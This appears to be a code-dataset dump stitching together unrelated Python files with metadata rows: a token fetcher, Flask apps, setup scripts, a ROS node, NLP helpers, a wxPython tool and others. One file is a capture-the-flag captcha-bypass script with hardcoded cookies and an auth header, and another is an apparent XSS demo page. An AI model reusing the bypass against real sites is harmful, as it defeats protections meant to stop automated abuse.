url = BASE_URL+'/token'
headers = {'Content-Type': 'application/json;charset=utf-8'}
payload = {
'grant_type': 'client_credentials',
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
r = requests.post(url,headers = headers,data = json.dumps(payload))
if r.status_code == 200:
data = json.loads(r.text)
# print(data)
print('获取access_token成功')
#这里返回的r.text是unicode类型,所以转换出来的dict需要用unicode编码的key取到
ukey = 'access_token'.encode('unicode_escape')
ACCESS_TOKEN = 'Bearer ' + data[ukey]
# 写入文件 w直接覆盖
fp = open(TOKEN_PATH, 'w')
fp.write(ACCESS_TOKEN)
fp.close()
else:
print('获取access_token失败')
pass
if __name__ == '__main__':
main()
| 23.202073 | 151 | 0.684457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,687 | 0.496857 |
d500b30356c6d10f466377f593728e458801fa4b | 556 | py | Python | manage.py | g90tony/tonys-perspective | c0296d8aabe7f170368341907e6b4015787347cd | [
"MIT"
] | null | null | null | manage.py | g90tony/tonys-perspective | c0296d8aabe7f170368341907e6b4015787347cd | [
"MIT"
] | null | null | null | manage.py | g90tony/tonys-perspective | c0296d8aabe7f170368341907e6b4015787347cd | [
"MIT"
] | null | null | null | from flask_script import Manager, Server
from flask_migrate import Migrate, MigrateCommand
from app import create_app, db
from app.models import User, Article, Category, Comment, Quote
app = create_app('development')
manager = Manager(app)
migrate= Migrate(app, db)
manager.add_command('db', MigrateCommand)
manager.add_command('server', Server)
@manager.shell
def make_shell_context():
return dict(app = app, db = db, User= User, Article= Article, Category= Category, Comment= Comment, Quote= Quote)
if __name__ == '__main__':
manager.run() | 26.47619 | 117 | 0.757194 | 0 | 0 | 0 | 0 | 158 | 0.284173 | 0 | 0 | 35 | 0.06295 |
d5025b15829b19f379302daca23271668cadecc4 | 389 | py | Python | setup.py | alvations/mindset | 05180a4bbf3162d97ffa148b0babc920764c6b1d | [
"MIT"
] | 2 | 2020-11-09T23:13:58.000Z | 2020-11-12T12:13:14.000Z | setup.py | alvations/mindset | 05180a4bbf3162d97ffa148b0babc920764c6b1d | [
"MIT"
] | null | null | null | setup.py | alvations/mindset | 05180a4bbf3162d97ffa148b0babc920764c6b1d | [
"MIT"
] | null | null | null | from distutils.core import setup
import setuptools
setup(
name = 'mindset',
packages = ['mindset'],
version = '0.0.1',
description = 'Mindset',
author = '',
url = 'https://github.com/alvations/mindset',
keywords = [],
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 21.611111 | 47 | 0.624679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.48072 |
d503452c7afa0f6d1b9b7a4cde6e1cea9bbc9d99 | 2,082 | py | Python | cir_project/cirp_user/scripts/camera_user.py | sprkrd/UPC-MAI-CIR | f9a6ef6e9c95534c1fdea6f9023c939bd89c2df8 | [
"MIT"
] | 1 | 2021-11-18T13:34:48.000Z | 2021-11-18T13:34:48.000Z | cir_project/cirp_user/scripts/camera_user.py | sprkrd/UPC-MAI-CIR | f9a6ef6e9c95534c1fdea6f9023c939bd89c2df8 | [
"MIT"
] | null | null | null | cir_project/cirp_user/scripts/camera_user.py | sprkrd/UPC-MAI-CIR | f9a6ef6e9c95534c1fdea6f9023c939bd89c2df8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
from peyetribe import EyeTribe
import time
from cir_user.srv import UserAction, UserActionResponse
TH1 = 1280*(1.0/3)
TH2 = 1280*(2.0/3)
IP = "192.168.101.72"
class CameraUserServer:
def __init__(self):
rospy.init_node("talker")
rospy.Service("poll_action", UserAction, self._action_cb)
self._next_action = None
# self._tracker = EyeTribe()
# self._tracker.connect(IP)
# self._tracker.pullmode()
def _action_cb(self, req):
rate = rospy.Rate(10)
action = self._next_action
while action is None:
rate.sleep()
action = self._next_action
self._next_action = None
return UserActionResponse(action=action)
def set_next_action(self):
inp = raw_input("Action: ")
self._next_action = inp
# inp = raw_input("Press p or d: ").strip()
# while inp not in ("p", "d"):
# inp = raw_input("Unknown action {}. Press p or d: ".format(inp)).strip()
# data_str = str(self._tracker.next()._avg)
# x_coord = float(data_str.split(";")[0])
# rospy.loginfo("x_coord=" + str(x_coord))
# if x_coord < TH1:
# direction = "L"
# elif x_coord < TH2:
# direction = "M"
# else:
# direction = "R"
# if inp == "p": # Pick action
# rospy.loginfo("Pick Action in coordinate:")
# action = "pick" + direction
# elif inp == "d":
# rospy.loginfo("Drop Action in coordinate:")
# action = "put" + direction
# if action == "putM": # Invalid action
# action = ""
# self._next_action = action
def shutdown(self):
self._tracker.close()
if __name__ == '__main__':
try:
user = CameraUserServer()
while True:
user.set_next_action()
except rospy.ROSInterruptException:
pass
finally:
print "Shutting down server..."
user.shutdown()
| 28.135135 | 86 | 0.56292 | 1,592 | 0.764649 | 0 | 0 | 0 | 0 | 0 | 0 | 830 | 0.398655 |
d50550ea66d6bcca0e8c6d873de65a99c1e874cd | 833 | py | Python | captcha_bypass.py | ruroot/captcha_bypass | 6457d7bb6152ddd8d784bac8cd99488f2534013e | [
"MIT"
] | null | null | null | captcha_bypass.py | ruroot/captcha_bypass | 6457d7bb6152ddd8d784bac8cd99488f2534013e | [
"MIT"
] | null | null | null | captcha_bypass.py | ruroot/captcha_bypass | 6457d7bb6152ddd8d784bac8cd99488f2534013e | [
"MIT"
] | null | null | null | import requests
cookie = {'_ga':'GA1.2.1373385590.1498799275','_gid':'GA1.2.867459789.1498799275','_gat':'1','PHPSESSID':'1kr76vh1164sbgeflnngimi321'}
url = 'http://captcha.ringzer0team.com:7421'
headers = {'Authorization':'Basic Y2FwdGNoYTpRSmM5VTZ3eEQ0U0ZUMHU='}
for i in range(1000):
# get captacha
r = requests.get("http://captcha.ringzer0team.com:7421/form1.php",cookies=cookie,headers=headers)
start_addr = r.text.find('if (A == "') + len('if (A == "')
end_addr = r.text.find('"',start_addr)
captcha = r.text[start_addr:end_addr]
print(i,":",captcha)
k = requests.get("http://captcha.ringzer0team.com:7421/captcha/captchabroken.php?new",cookies=cookie,headers=headers)
data = {'captcha': captcha}
k = requests.post('http://captcha.ringzer0team.com:7421/captcha1.php',cookies=cookie,headers=headers,data=data)
| 55.533333 | 134 | 0.727491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 429 | 0.515006 |
d505765173ba8ae48d059a5d6519553fdbd987f4 | 685 | py | Python | antlr-python/ChatErrorListener.py | evilkirin/antlr-mega-tutorial | 91135a7b2fc9e99b9fc500b290a4a2893d328bf8 | [
"MIT"
] | 138 | 2017-03-08T14:29:54.000Z | 2020-04-25T23:00:26.000Z | antlr-python/ChatErrorListener.py | evilkirin/antlr-mega-tutorial | 91135a7b2fc9e99b9fc500b290a4a2893d328bf8 | [
"MIT"
] | 17 | 2020-05-08T10:10:39.000Z | 2022-01-21T20:40:16.000Z | lifestyle/antlr-mega-tutorial-master/antlr-python/ChatErrorListener.py | pennz/antlr_lifestyle | e97f0a2e125fc851b637ef854e5d4968491acb42 | [
"BSD-3-Clause"
] | 38 | 2017-03-15T02:44:17.000Z | 2020-03-30T10:24:15.000Z | import sys
from antlr4 import *
from ChatParser import ChatParser
from ChatListener import ChatListener
from antlr4.error.ErrorListener import *
import io
class ChatErrorListener(ErrorListener):
def __init__(self, output):
self.output = output
self._symbol = ''
def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):
self.output.write(msg)
if offendingSymbol is not None:
self._symbol = offendingSymbol.text
else:
self._symbol = recognizer.getTokenErrorDisplay(offendingSymbol);
@property
def symbol(self):
return self._symbol | 29.782609 | 85 | 0.646715 | 529 | 0.772263 | 0 | 0 | 67 | 0.09781 | 0 | 0 | 2 | 0.00292 |
d50622fc11746b41527aa6f48d3bb22b36bbce6d | 568 | py | Python | home/urls.py | auxfuse/ci-hackathon-app | 87d5ad7aae33c15f535ceed28e1657a014159516 | [
"MIT"
] | 11 | 2020-10-06T13:50:46.000Z | 2021-02-27T20:19:17.000Z | home/urls.py | auxfuse/ci-hackathon-app | 87d5ad7aae33c15f535ceed28e1657a014159516 | [
"MIT"
] | 174 | 2020-10-13T18:25:34.000Z | 2022-01-17T09:49:18.000Z | home/urls.py | auxfuse/ci-hackathon-app | 87d5ad7aae33c15f535ceed28e1657a014159516 | [
"MIT"
] | 46 | 2020-10-14T11:27:20.000Z | 2022-01-31T17:48:12.000Z | from django.urls import path
from . import views
urlpatterns = [
path("", views.home, name="home"),
path("faq/", views.faq, name="faq"),
path("plagiarism_policy/", views.plagiarism_policy,
name="plagiarism_policy"),
path("privacy_policy/", views.privacy_policy, name="privacy_policy"),
path("post_login/", views.index, name="post_login"),
path("save_partnership_contact_form/", views.save_partnership_contact_form,
name="save_partnership_contact_form"),
path("500/", views.test_500),
path("404/", views.test_404),
]
| 33.411765 | 79 | 0.68662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 191 | 0.336268 |
d5068f56351c172f868906780ca7bfa27fd8680d | 13,750 | py | Python | ogreyMaterialTool.py | opengd/OgreyTool | 42e169fe530458084c20d6fb3e7a2dc78f1ac487 | [
"MIT"
] | null | null | null | ogreyMaterialTool.py | opengd/OgreyTool | 42e169fe530458084c20d6fb3e7a2dc78f1ac487 | [
"MIT"
] | null | null | null | ogreyMaterialTool.py | opengd/OgreyTool | 42e169fe530458084c20d6fb3e7a2dc78f1ac487 | [
"MIT"
] | null | null | null | import wx
from ogreyPopupMenu import *
from ogreyOgreManagers import *
from ogreyTool import *
class Singleton(type):
def __init__(self, *args):
type.__init__(self, *args)
self._instances = {}
def __call__(self, *args):
if not args in self._instances:
self._instances[args] = type.__call__(self, *args)
return self._instances[args]
class Test:
__metaclass__=Singleton
def __init__(self, *args): pass
ta1, ta2 = Test(), Test()
assert ta1 is ta2
tb1, tb2 = Test(5), Test(5)
assert tb1 is tb2
assert ta1 is not tb1
class LogList(wx.TextCtrl):
def __init__(self, parent):
wx.TextCtrl.__init__(self, parent, -1, "", style=wx.TE_MULTILINE)
class ogreyMaterialTool(wx.MiniFrame):
def __init__(self, parent, config, ogreMgr):
wx.MiniFrame.__init__(self, parent, -1, "Material Tool", size = (500, 500))
self.parent = parent
self.config = config
#self.ogreManager = OgreManager()
self.ogreMgr = OgreManager().ogreMgr
self.Show(True)
self.define()
wx.EVT_CLOSE(self, self.OnClose)
def OnClose(self, event):
self.Show(False)
def define(self):
self.defineSplitters()
self.defineTrees()
def definePopupMenu(self):
pass
## self.popupMenu = PopupMenu()
## self.popupMenuItems = [
## {"type" : "AddMaterial", "enabled" : False, "menuItem" : "Submenu", "name" : "Add",
## "items" : [
## {"type" : "Technique", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Technique"), "event" : self.AddTechnique} , # Technique
## {"type" : "Pass", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Pass"), "event" : self.AddPass} , # Pass
## {"type" : "Texture unit", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Texture unit"), "event" : self.AddTextureUnit} , # Textureunit
## {"type" : "Vertex program ref", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Vertex program ref"), "event" : self.AddVertexProgramRef} , # "Vertex program ref
## {"type" : "FragmentProgramRef", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Fragment program ref"), "event" : self.AddFragmentProgramRef} , # Fragment program ref
## ],
## },
## {"type" : "AddVertexProgram", "enabled" : False, "menuItem" : "Submenu", "name" : "Add",
## "items" : [
## {"type" : "Default params", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Default params"), "event" : self.AddDefaultParams} , # Defaultparams
## ],
## },
## {"type" : "Material", "enabled" : True, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "New Material"), "event" : self.AddMaterial} , # Create a new Entity
## {"type" : "Vertex program", "enabled" : True, "menuItem" :wx.MenuItem(self.entityPopupMenu, -1, "New Vertex Program"), "event" : self.AddVertexProgram}, # Deletet Object
## {"type" : "Fragment program", "enabled" : True, "menuItem" :wx.MenuItem(self.entityPopupMenu, -1, "New Fragment Program"), "event" : self.AddFragmentProgram}, # Deletet Object
## {"type" : "Create New Material File", "enabled" : True, "menuItem" :wx.MenuItem(self.entityPopupMenu, -1, "Create New Material File"), "event" : self.OnCreateNewMaterial}, # Deletet Object
## {"type" : "Delete", "enabled" : False, "menuItem" :wx.MenuItem(self.entityPopupMenu, -1, "Delete Object"), "event" : self.OnDelete}, # Deletet Object
## #{"type" : "Seperator", "enabled" : True, "menuItem" : "Seperator"},
## #{"type" : "Import", "enabled" : True, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Import Entity/Entities"), "event" : self.OnImport} , # Import Entity Menu Item
## #{"type" : "Export", "enabled" : False, "menuItem" : wx.MenuItem(self.entityPopupMenu, -1, "Export Entity"), "event" : self.OnExport} , # Export Entity Menu Item
## ]
## self.popupMenu.AddMenuItems(self.popupMenuItems)
## self.Bind(wx.EVT_RIGHT_DOWN, self.EnityTreeRightMenu)
## self.Bind(wx.EVT_TREE_SEL_CHANGED,self.ShowObjectInformation)
def defineSplitters(self):
self.halfsplitter = wx.SplitterWindow(self)
self.halfsplitter.SetSashGravity(0.5)
self.halfsplitter.SetSize(self.GetSize())
self.leftsplitter = wx.SplitterWindow(self.halfsplitter)
self.rightsplitter = wx.SplitterWindow(self.halfsplitter)
self.halfsplitter.SplitVertically(self.leftsplitter, self.rightsplitter, 0.5)
def defineTrees(self):
self.materialAttributes = MaterialAttributes(self.rightsplitter)
self.materialPreview = wx.Notebook(self.rightsplitter, -1)
self.ogreScene = OgreScene(self.ogreMgr, self.materialPreview, NameFactory())
self.ogreView = self.ogreScene.create()
self.materialPreview.AddPage(self.ogreView, "Preview")
self.rightsplitter.SplitHorizontally(self.materialAttributes, self.materialPreview, 0.5)
self.resourceTree = MaterialResourceTree(self.leftsplitter, self.config)
self.materialTree = MaterialTree(self.leftsplitter)
self.leftsplitter.SplitVertically(self.resourceTree, self.materialTree, 0.5)
def defineWindows(self):
pass
class MaterialSplitter(wx.SplitterWindow):
def __init__(self, parent):
wx.SplitterWindow.__init__(self, parent)
self.SetSashGravity(0.5)
self.SetSize(parent.GetSize())
class MaterialResourceTree(wx.TreeCtrl):
def __init__(self, parent, config):
wx.TreeCtrl.__init__(self, parent, -1)
self.config = config
self.Show(True)
self.AddRoot("Material Resource")
for c in self.config.Resources["Materials"]["resources"]:
self.AppendItem(self.GetRootItem(), c)
for c in ResourceInformation().loadedMaterials:
print c
self.AppendItem(self.GetRootItem(), c)
class MaterialTree(wx.TreeCtrl):
def __init__(self, parent):
wx.TreeCtrl.__init__(self, parent, -1)
self.Show(True)
class MaterialAttributes(wx.Notebook):
def __init__(self, parent):
wx.Notebook.__init__(self, parent, -1)
l1, l2 = LogList(self), LogList(self)
self.AddPage(l1, "Log1")
self.AddPage(l2, "Log2")
l1.AppendText("moaster")
l2.AppendText("satans")
class MaterialPreviewAttributes(wx.Window):
def __init__(self, parent, ogreMgr):
wx.Window.__init__(self, parent)
class MaterialPreviewView(wx.Window):
def __init__(self, parent, ogreMgr):
wx.Window.__init__(self, parent)
self.parent = parent
self.ogreMgr = OgreManager().ogreMgr
self.nameFactory = NameFactory()
class Attributes:
__metaclass__=Singleton
def __init__(self):
pass
def showObjectAttributes(self, Attributes, name):
column = (5, 105, 205)
row = 22
pan = self.foldPanel.AddFoldPanel(name, False)
r = 0
tulo = wx.Panel(pan, -1, style = wx.FULL_REPAINT_ON_RESIZE)
for attrib in Attributes:
c = 0
for rowItem in attrib:
if rowItem["type"] == "text":
obj = wx.TextCtrl(tulo, -1,"", style=rowItem["style"], pos = (column[c], row*r))
if not rowItem["attribs"] == None: obj.SetDefaultStyle(rowItem["attribs"])
obj.WriteText(rowItem["value"])
obj.SetEditable(rowItem["editable"])
if not rowItem["event"] == None:
obj.Bind(wx.EVT_TEXT, rowItem["event"])
elif rowItem["type"] == "bitmapbutton":
modelButton = wx.BitmapButton(tulo, -1,rowItem["image"], pos = (column[c], row*r))
modelButton.Bind(wx.EVT_BUTTON, rowItem["event"])
elif rowItem["type"] == "combobox":
comboBox = wx.ComboBox(tulo, -1, pos=(column[c], row*r), choices=rowItem["value"], style=rowItem["style"], size = (self.GetSizeTuple()[0] -8, -1))
comboBox.Bind(wx.EVT_COMBOBOX, rowItem["event"])
elif rowItem["type"] == "button":
modelButton = wx.Button(tulo, -1,rowItem["value"], pos = (column[c], row*r))
modelButton.Bind(wx.EVT_BUTTON, rowItem["event"])
elif rowItem["type"] == "checkbox":
checkbox = wx.CheckBox(tulo, -1, rowItem["value"], pos = (column[c]+5, row*r))
checkbox.Bind(wx.EVT_CHECKBOX, rowItem["event"])
checkbox.SetValue(rowItem["state"])
elif rowItem["type"] == "slider":
slider = wx.Slider(tulo, -1, value = rowItem["value"],
minValue = rowItem["minValue"], maxValue = rowItem["maxValue"],
style = rowItem["style"], pos = (column[c], row*r))
slider.Bind(wx.EVT_SLIDER, rowItem["event"])
elif rowItem["type"] == "panel":
panel = wx.Panel(tulo, -1, pos = (column[c], row*r), size = rowItem["size"], style= rowItem["style"])
panel.SetBackgroundColour(rowItem["bgcolor"])
panel.Refresh(True, None)
elif rowItem["type"] == "textctrl":
self.text = wx.TextCtrl(tulo, -1, rowItem["value"], pos=(column[c], row*r), size = (self.GetSizeTuple()[0] -8,rowItem["height"]),style = rowItem["style"])
self.text.Bind(wx.EVT_TEXT, rowItem["event"])
elif rowItem["type"] == "comment":
text = wx.StaticText(tulo, -1,label = rowItem["label"],pos = (column[c], row*r))
elif rowItem["type"] == "empty":
pass
c += 1
r += 1
tulo.Fit()
self.FoldPanelWindow(pan, tulo)
class MaterialOptions:
def __init__(self, mmaterial):
self.object = mmaterial
self.Options =[
[
{"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
{"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
]
]
def OnName(self, event):
self.object.name = event.GetClientObject().GetValue()
class TechniqueOptions:
def __init__(self, mtechnique):
self.mtechnique = mtechnique
self.Options = []
class PassOptions:
def __init__(self, mpass):
self.mpass = mpass
self.Options = []
class TextureUnitOptions:
def __init__(self, mtextureUnit):
self.mtextureUnit = mtextureUnit
self.Options = []
class VertexProgramRefOptions:
def __init__(self, mvertexProgramRef):
self.object = mvertexProgramRef
self.Options =[
[
{"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
{"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
]
]
def OnName(self, event):
self.object.name = event.GetClientObject().GetValue()
class FragmentProgramRefOptions:
def __init__(self, mfragmentProgramRef):
self.object = mfragmentProgramRef
self.Options =[
[
{"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
{"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
]
]
def OnName(self, event):
self.object.name = event.GetClientObject().GetValue()
class VertexProgramOptions:
def __init__(self, mvertexProgram):
self.object = mvertexProgram
self.Options =[
[
{"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
{"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
]
]
def OnName(self, event):
self.object.name = event.GetClientObject().GetValue()
class FragmentProgramOptions:
def __init__(self, mfragmentProgram):
self.object = mfragmentProgram
self.Options =[
[
{"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
{"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
]
]
def OnName(self, event):
self.object.name = event.GetClientObject().GetValue()
| 43.650794 | 203 | 0.583782 | 13,445 | 0.977818 | 0 | 0 | 0 | 0 | 0 | 0 | 4,040 | 0.293818 |
d506de8e02af069210ffd80855347f0a1726c56d | 2,366 | py | Python | utils/nlp.py | dominikmn/one-million-posts | a628e88874ca7134a7628d88de169e8520f8deba | [
"MIT"
] | null | null | null | utils/nlp.py | dominikmn/one-million-posts | a628e88874ca7134a7628d88de169e8520f8deba | [
"MIT"
] | 95 | 2021-03-26T14:37:37.000Z | 2021-09-07T08:26:03.000Z | utils/nlp.py | dominikmn/one-million-posts | a628e88874ca7134a7628d88de169e8520f8deba | [
"MIT"
] | 2 | 2021-04-19T15:43:57.000Z | 2021-04-19T15:57:47.000Z | import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
stopwords=stopwords.words('german')
nltk.download('punkt')
from nltk.stem.snowball import SnowballStemmer
import spacy
from spacy_iwnlp import spaCyIWNLP
nlp=spacy.load('de') #You need to download the 'de'-module in advance. This will be done automatically if you run `make setup` via the Makefile found in the main folder of the repo.
from pathlib import Path
path_here = Path(__file__).resolve().parent
iwnlp=spaCyIWNLP(lemmatizer_path= path_here / "../data/IWNLP.Lemmatizer_20181001.json")
nlp.add_pipe(iwnlp)
stemmer = SnowballStemmer('german')
from utils import cleaning
def strip_stopwords(series, stopwords=stopwords):
'''Strip stopwords of series of strings
Arguments: series - a series containing strings, stopwords - a list of stopwords (default: german)
Return: new-series - a series of strings without stopwords'''
series=series.copy()
new_series = series.apply(lambda x: " ".join([word.lower() for word in x.split() if word.lower() not in (stopwords)]) if x is not None else x)
return new_series
def stem_germ(x):
'''stemms german texts
Arguments: x - a string containing german text
Return : stemmed - the stemmed german text'''
tok = nltk.word_tokenize(cleaning.normalize(x))
stemmed = " ".join([stemmer.stem(word) for word in tok])
return stemmed
def lem_germ(x):
'''lemmatizes german texts
Arguments: x - a string containing german text
Return : lemmed - the lemmatized german text'''
tok = nlp(cleaning.normalize(x))
lemmed=""
for word in tok:
try:
lemmed+=" " + word._.iwnlp_lemmas[0]
except:
lemmed+=" " + str(word)
return lemmed
def lem_stem(series, lem_stem):
'''stemms or lemmatizes (or both) a series of german texts.
Arguments: series - a pandas series containing german texts.
lem_stem - option wether to stem (="stem") to lemmatize (="lem") or to lemmatize then stem (="lem_stem")
Return: new series - a stemmed or lemmatized (or both) series'''
if lem_stem == 'stem':
new_series = series.apply(stem_germ)
elif lem_stem == 'lem':
new_series = series.apply(lem_germ)
elif lem_stem == 'lem_stem':
new_series = series.apply(lem_germ).apply(stem_germ)
return new_series
| 38.16129 | 181 | 0.695689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,047 | 0.442519 |
d5079b7e4434645da0fb5e3ffaa6425629f4d22f | 2,960 | py | Python | heat/engine/resources/__init__.py | pshchelo/heat | 6cf94a3ece89d77b839f61292e5f023c3f192c82 | [
"Apache-2.0"
] | null | null | null | heat/engine/resources/__init__.py | pshchelo/heat | 6cf94a3ece89d77b839f61292e5f023c3f192c82 | [
"Apache-2.0"
] | null | null | null | heat/engine/resources/__init__.py | pshchelo/heat | 6cf94a3ece89d77b839f61292e5f023c3f192c82 | [
"Apache-2.0"
] | null | null | null | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from stevedore import extension
from heat.engine import clients
from heat.engine import environment
from heat.engine import plugin_manager
def _register_resources(env, type_pairs):
for res_name, res_class in type_pairs:
env.register_class(res_name, res_class)
def _register_constraints(env, type_pairs):
for constraint_name, constraint in type_pairs:
env.register_constraint(constraint_name, constraint)
def _register_stack_lifecycle_plugins(env, type_pairs):
for stack_lifecycle_name, stack_lifecycle_class in type_pairs:
env.register_stack_lifecycle_plugin(stack_lifecycle_name,
stack_lifecycle_class)
def _get_mapping(namespace):
mgr = extension.ExtensionManager(
namespace=namespace,
invoke_on_load=False)
return [[name, mgr[name].plugin] for name in mgr.names()]
_environment = None
def global_env():
if _environment is None:
initialise()
return _environment
def initialise():
global _environment
if _environment is not None:
return
clients.initialise()
global_env = environment.Environment({}, user_env=False)
_load_global_environment(global_env)
_environment = global_env
def _load_global_environment(env):
_load_global_resources(env)
environment.read_global_environment(env)
def _load_global_resources(env):
_register_constraints(env, _get_mapping('heat.constraints'))
_register_stack_lifecycle_plugins(
env,
_get_mapping('heat.stack_lifecycle_plugins'))
manager = plugin_manager.PluginManager(__name__)
# Sometimes resources should not be available for registration in Heat due
# to unsatisfied dependencies. We look first for the function
# 'available_resource_mapping', which should return the filtered resources.
# If it is not found, we look for the legacy 'resource_mapping'.
resource_mapping = plugin_manager.PluginMapping(['available_resource',
'resource'])
constraint_mapping = plugin_manager.PluginMapping('constraint')
_register_resources(env, resource_mapping.load_all(manager))
_register_constraints(env, constraint_mapping.load_all(manager))
def list_opts():
from heat.engine.resources.aws.lb import loadbalancer
yield None, loadbalancer.loadbalancer_opts
| 31.827957 | 79 | 0.731757 | 0 | 0 | 121 | 0.040878 | 0 | 0 | 0 | 0 | 926 | 0.312838 |
d509b5f72e083aa61cb8b128a7291eccbddaaf89 | 858 | py | Python | research/02_TrafficSignClassification/02_CarNDTrafficSignClassifier/source/path/run.py | LewisCollum/frostAV | f17966b2646640ee1d29f80f951f9622fdbbb78a | [
"MIT"
] | 5 | 2020-04-20T09:56:59.000Z | 2022-01-10T15:51:02.000Z | research/02_TrafficSignClassification/02_CarNDTrafficSignClassifier/source/path/run.py | LewisCollum/frostAV | f17966b2646640ee1d29f80f951f9622fdbbb78a | [
"MIT"
] | 1 | 2020-08-26T01:04:55.000Z | 2020-08-26T02:00:14.000Z | research/02_TrafficSignClassification/02_CarNDTrafficSignClassifier/source/path/run.py | LewisCollum/frostAV | f17966b2646640ee1d29f80f951f9622fdbbb78a | [
"MIT"
] | 2 | 2020-01-21T18:58:53.000Z | 2020-05-20T04:24:40.000Z | import os
from datetime import datetime
directory = "../runs"
current = os.path.join(directory, ".current")
class Run:
def __init__(self, runName):
run = os.path.join(directory, runName)
self.model = os.path.join(run, "model.h5")
self.log = os.path.join(run, "log.csv")
self.accuracy = os.path.join(run, "accuracy.png")
self.modelDiagram = os.path.join(run, "model.png")
self.modelSummary = os.path.join(run, "modelSummary")
def make():
runName = f"{datetime.now():%m-%d_%H%M}"
newRun = os.path.join(directory, runName)
os.mkdir(newRun)
with open(current, 'w') as f:
f.write(runName)
def loadFromName(runName):
return Run(runName)
def loadCurrent():
with open(current) as f:
return loadFromName(f.readline())
def has(path):
return os.path.isfile(path)
| 26.8125 | 61 | 0.635198 | 368 | 0.428904 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.128205 |
d50ac85d5573725c47a9716c89b128de25b4d933 | 415 | py | Python | flask_code/day02_request/12xss.py | haitaoss/flask_study | c8431f17c1156b7086d85c914edbfb5293ae50f1 | [
"Apache-2.0"
] | null | null | null | flask_code/day02_request/12xss.py | haitaoss/flask_study | c8431f17c1156b7086d85c914edbfb5293ae50f1 | [
"Apache-2.0"
] | null | null | null | flask_code/day02_request/12xss.py | haitaoss/flask_study | c8431f17c1156b7086d85c914edbfb5293ae50f1 | [
"Apache-2.0"
] | null | null | null | # coding:utf-8
from flask import Flask, render_template, request
# 创建flask应用
app = Flask(__name__)
# 视图函数
@app.route('/xss', methods=['POST', 'GET'])
def xss():
text = ""
if request.method == 'POST':
text = request.form.get('text')
return render_template('xss.html', text=text)
# 启动flas应用
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# manager.run()
| 17.291667 | 50 | 0.626506 | 0 | 0 | 0 | 0 | 191 | 0.43508 | 0 | 0 | 140 | 0.318907 |
d50c7c2f1fa783afbf677f62ca8de9f21c378df9 | 1,543 | py | Python | mk312/constants.py | bkifft/mk312com | a36fd20bc8518f81e2de23c9fff28296cb9cb6d6 | [
"MIT"
] | 2 | 2022-03-12T14:09:46.000Z | 2022-03-16T21:44:34.000Z | mk312/constants.py | bkifft/mk312com | a36fd20bc8518f81e2de23c9fff28296cb9cb6d6 | [
"MIT"
] | 1 | 2021-04-15T17:58:43.000Z | 2021-04-15T17:58:43.000Z | mk312/constants.py | Rubberfate/mk312com | a36fd20bc8518f81e2de23c9fff28296cb9cb6d6 | [
"MIT"
] | 2 | 2021-03-16T20:32:59.000Z | 2022-03-12T14:30:16.000Z | # -*- coding: utf-8 -*-
# Memory addresses
ADDRESS_R15 = 0x400f
ADDRESS_ADC_POWER = 0x4062
ADDRESS_ADC_BATTERY = 0x4063
ADDRESS_LEVELA = 0x4064
ADDRESS_LEVELB = 0x4065
ADDRESS_PUSH_BUTTON = 0x4068
ADDRESS_COMMAND_1 = 0x4070
ADDRESS_COMMAND_2 = 0x4071
ADDRESS_MA_MIN_VALUE = 0x4086
ADDRESS_MA_MAX_VALUE = 0x4087
ADDRESS_CURRENT_MODE = 0x407b
ADDRESS_LCD_WRITE_PARAMETER_1 = 0x4180
